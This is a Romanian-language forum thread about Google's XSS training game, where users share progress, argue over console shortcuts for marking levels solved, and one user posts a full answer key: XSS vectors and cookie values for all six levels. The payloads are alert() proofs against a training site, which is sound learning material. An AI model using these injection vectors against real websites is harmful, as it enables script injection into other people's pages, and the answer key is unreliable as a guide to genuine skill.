B7ackAnge7z Posted May 31, 2014 Report Posted May 31, 2014 XSS game: https://xss-game.appspot.com/ps. Poft? bun?! Quote
valcea55 Posted May 31, 2014 Report Posted May 31, 2014 (edited) Frumos, dar am ramas la lvl 5:)) poate reusesc sa trec:D.Edit:Am reusit sa trec de 5 sa vedem ce fac la 6:DEdit2:Gata, a fost foarte frumos si distractiv. Edited May 31, 2014 by valcea55 1 Quote
Active Members dancezar Posted May 31, 2014 Active Members Report Posted May 31, 2014 http://s24.postimg.org/hvjdgzr0z/xss.pngNice ma asteptam la ceva mai greu, dar au fost interesante. Unele cred ca au fost inspirate din cele care au fost gasite la ei//la 6 nici nu a fost nevoie sa execut xss din fisier extern Quote
Rikudo Posted May 31, 2014 Report Posted May 31, 2014 E o conspiratie totala, undeva se pastreaza toti vectorii testati de voi, astia fac bani pe spatele vostru. @ Am ajuns la nivelul 3, nu am mai continuat, e interesant. Quote
alexvenutelli Posted May 31, 2014 Report Posted May 31, 2014 Si eu am ajuns pana la level 4 si m-am oprit.. m-am plictisit.. e dragut jocu , e util pt incepatori sa invete sa faca alert:)Have fun Quote
zachary1337 Posted June 1, 2014 Report Posted June 1, 2014 mi-a captat atentia , e interesant joculetul Quote
Guest PoorStudentPleaseDonate Posted June 1, 2014 Report Posted June 1, 2014 userOpenedAlert = true; levelSolved();Daca vreti sa va laudati ca l-ati facut, ca deh.. vreti sa fiti si voi smecheri, bagati codul ala in consola la toate levelurile. Quote
B7ackAnge7z Posted June 2, 2014 Author Report Posted June 2, 2014 @PoorStudentPleaseDonate,Dac? tot doreai s? te lauzi, în loc de un copy + paste, c?utai mai bine ?i foloseai:postMessage('success', '*');Apoi, cu ceva if-uri ?i document.getElementsByClassName('next-button')[0].click(); f?ceai ca challenge-ul s? fie trecut automat în câteva secunde. Sau, având cuno?tin?e în domeniul criptografiei, observai c? toate datele necesare sunt salvate în fi?ierele cookie ?i cu „pu?in” noroc aflai ce metod? a fost folosit? la encriptarea datelor. Iar dac? ?i aceast? metod? î?i p?rea prea simpl? — exploatai vreo vulnerabilitate din QUIC sau SSL ce î?i permitea s? ob?ii accesul la server. ?i cirea?a de pe tort — luai leg?tura cu un inginer Google ?i folosind ingineria social? aflai r?spunsurile la toate nivelele acestui „banal” challenge.Apoi, veneai pe forum ?i î?i b?teai joc de to?i „l?ud?ro?ii” care, spre deosebire de tine, nu au dat un search pe Google pentru a trece testul cu ajutorul faimosului Ctrl+C/Ctrl+V, ci s-au bucurat c? au ocazia s?-?i testeze înc? o dat? cuno?tin?ele ?i s? se bucure de rezultatul ob?inut. Quote
Guest PoorStudentPleaseDonate Posted June 2, 2014 Report Posted June 2, 2014 Hahaha. Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost in game.js? Again, hahaha )) Quote
alexvenutelli Posted June 2, 2014 Report Posted June 2, 2014 @B7ackAnge7z pe mine unu mai bagat in ceata:) )) Quote
B7ackAnge7z Posted June 2, 2014 Author Report Posted June 2, 2014 Ce vrei sa zici, ca am copiat scriptul js care il gaseste orice prost?Exact. Doar c? am f?cut-o pe o not? ironic? încercând s? nu te jignesc, chiar dac? o meritai.Nu te sup?ra prea tare, dar sunt mai mult ca sigur c? tu nu ai g?sit aceste linii de cod în fi?ierul game.js, deoarece, dac? le-ai fi g?sit de unul singur, mai întâi de toate observai window.addEventListener("message", function(event) { ?i astfel, ai fi fost postat o singur? linie de cod ?i nicidecum dou?. Quote
Guest PoorStudentPleaseDonate Posted June 3, 2014 Report Posted June 3, 2014 (edited) Haha, deci tot continui sa sustii ca am copiat scriptul de pe google, nu? ) Si daca il faceam automat sa treaca toate nivelele, ce rost mai avea? Asa poti sa vezi fiecare nivel, vezi cum e, etc. Stai linistit ca l-am terminat fara niciun trick, nu stii cine sunt, asta e.Si cu ce meritam sa fiu jignit? Ca am dat copy-paste din game.js, sau ce?Btw, nu stiu la ce te referi cu eventul ala, in eventul aia se afla "userOpenedAlert = true;levelSolved();" , cum puteai sa faci tu asta doar intr-o linie? ))))Daca erai baiat destept si te uitai in sursa, vedeai ca daca nu ai useropenedalert pe true, iti dadea handle, deci.... nu te mai da destept pe cand nu esti.Si "postMessage('success', '*');", nu se afla in acel event, defapt, nici nu e in game.js ci in game-frame.js. Asa pot sa zic si eu, c-ai copiat postMessage('success', '*'); de pe google, sau nu stiu eu de unde. Edited June 3, 2014 by PoorStudentPleaseDonate Quote
Complex Posted June 3, 2014 Report Posted June 3, 2014 L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !Level 1Nume cookie: level1valoarea: f148716ef4ed1ba0f192cde4618f8dc5------------------------------------------Vector: <script>alert('complex')</script>------------------------------------------Level 2:Nume cookie: level2Valoarea: b5e530302374aa71cc3028c810b63641------------------------------------------vector: <img src='#' onerror='alert("Complex")'>------------------------------------------Level 3:Nume cookie: level3Valoarea: d5ce029d0680b3816a349da0d055fcfa------------------------------------------Vector: ' onerror='alert("complex")'>------------------------------------------Level 4:Nume cookie: level4Valoarea: b4fd7f4bb46f1b41c959d338e46bced5------------------------------------------Vector: ');alert('complex------------------------------------------Level 5:Nume cookie: level5Valoarea: e9ea371449372dfc9b55be78167ce361------------------------------------------Vector: javascript:alert('complex')------------------------------------------Level 6:Nume cookie: level6Valoarea: ccc652842914ba1a49b4b9ab2b227c2c------------------------------------------Vector: data:text/plain,alert('complex')------------------------------------------ Quote
B7ackAnge7z Posted June 3, 2014 Author Report Posted June 3, 2014 Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):postMessage('success', '*')frames[0].alert(1)window[0].alert(1)?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat. Quote
Guest PoorStudentPleaseDonate Posted June 3, 2014 Report Posted June 3, 2014 Problema este c? testul poate fi trecut automat în mai multe moduri, dar tocmai ceea ce ai postat tu era deja public (chiar înainte de a scrie despre challenge), iat? din ce cauz? am aceste suspiciuni.Da, sunt de acord c? liniile postate de tine pot fi g?site în game.js, dar a?a cum am mai spus, cred, c? dac? le g?seai singur publicai o rezolvare mai simpl? (?i nu neap?rat g?sit? în surs?). Iat? câteva exemple (?i dup? cum vezi, e posibil):postMessage('success', '*')frames[0].alert(1)window[0].alert(1)?i nu doream s? o fac pe de?teptul, a?a cum ai spus tu — îns?, am v?zut c? tu ai dorit s? o faci. Iat? de ce ?i-am scris.ps. Consider c? aceast? discu?ie nu-?i are locul aici ?i ar fi mai bine s? continu?m în privat.Sincer, nici eu nu vreau sa fac pe desteptul, dar m-am revoltat ca m-ai acuzat de copy-paste, nefiind adevarat. Ai zis ca daca ma uitam mai bine prin game.js, vedeam ca pot sa rezolv dintr-o singura linie. Linia pe care mi-ai dat-o tu, e in game-frame.js.Anyway, daca vrei sa continuam discutia, imi zici si vorbim, bine-inteles in privat. Quote
Active Members dancezar Posted June 3, 2014 Active Members Report Posted June 3, 2014 (edited) L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !Level 1Nume cookie: level1valoarea: f148716ef4ed1ba0f192cde4618f8dc5------------------------------------------Vector: <script>alert('complex')</script>------------------------------------------Level 2:Nume cookie: level2Valoarea: b5e530302374aa71cc3028c810b63641------------------------------------------vector: <img src='#' onerror='alert("Complex")'>------------------------------------------Level 3:Nume cookie: level3Valoarea: d5ce029d0680b3816a349da0d055fcfa------------------------------------------Vector: ' onerror='alert("complex")'>------------------------------------------Level 4:Nume cookie: level4Valoarea: b4fd7f4bb46f1b41c959d338e46bced5------------------------------------------Vector: ');alert('complex------------------------------------------Level 5:Nume cookie: level5Valoarea: e9ea371449372dfc9b55be78167ce361------------------------------------------Vector: javascript:alert('complex')------------------------------------------Level 6:Nume cookie: level6Valoarea: ccc652842914ba1a49b4b9ab2b227c2c------------------------------------------Vector: data:text/plain,alert('complex')------------------------------------------Bravo desteptule , bine ca esti tu destept si nu ii lasi si pe alti sa il rezolve .Cica "L-am terminat eu..." l-ai terminat si tu , vrei sa spui.//edit fail a folosit acelasi vectori ca aici http://hacktracking.blogspot.de/2014/05/xss-game-area.html Edited June 3, 2014 by danyweb09 Quote
Guest PoorStudentPleaseDonate Posted June 3, 2014 Report Posted June 3, 2014 L-am terminat eu si v-am pus la dispozitiile cooki-urile si vectorii care trebuie sa ii folositi !Level 1Nume cookie: level1valoarea: f148716ef4ed1ba0f192cde4618f8dc5------------------------------------------Vector: <script>alert('complex')</script>------------------------------------------Level 2:Nume cookie: level2Valoarea: b5e530302374aa71cc3028c810b63641------------------------------------------vector: <img src='#' onerror='alert("Complex")'>------------------------------------------Level 3:Nume cookie: level3Valoarea: d5ce029d0680b3816a349da0d055fcfa------------------------------------------Vector: ' onerror='alert("complex")'>------------------------------------------Level 4:Nume cookie: level4Valoarea: b4fd7f4bb46f1b41c959d338e46bced5------------------------------------------Vector: ');alert('complex------------------------------------------Level 5:Nume cookie: level5Valoarea: e9ea371449372dfc9b55be78167ce361------------------------------------------Vector: javascript:alert('complex')------------------------------------------Level 6:Nume cookie: level6Valoarea: ccc652842914ba1a49b4b9ab2b227c2c------------------------------------------Vector: data:text/plain,alert('complex')------------------------------------------Scuze de off...Ti-ai cam luat fail, vectorii sunt la fel ca aici:hacktracking: # XSS game area (un simplu search pe google cu data:text/plain,alert(1) xss game) Quote
Erase Posted June 5, 2014 Report Posted June 5, 2014 Mai bine ca a terminat jocul cu vectori de pe Google decat sa adauge companiei alti vectori in baza de date de care ei probabil habar nu aveau, ca in cele din urma in proiectele viitoare sa se poata proteja de astfel de atacuri.Parerea mea personala e ca mai bine v-ati focusa sa le luati banii decat sa ii invatati gratuit. Quote
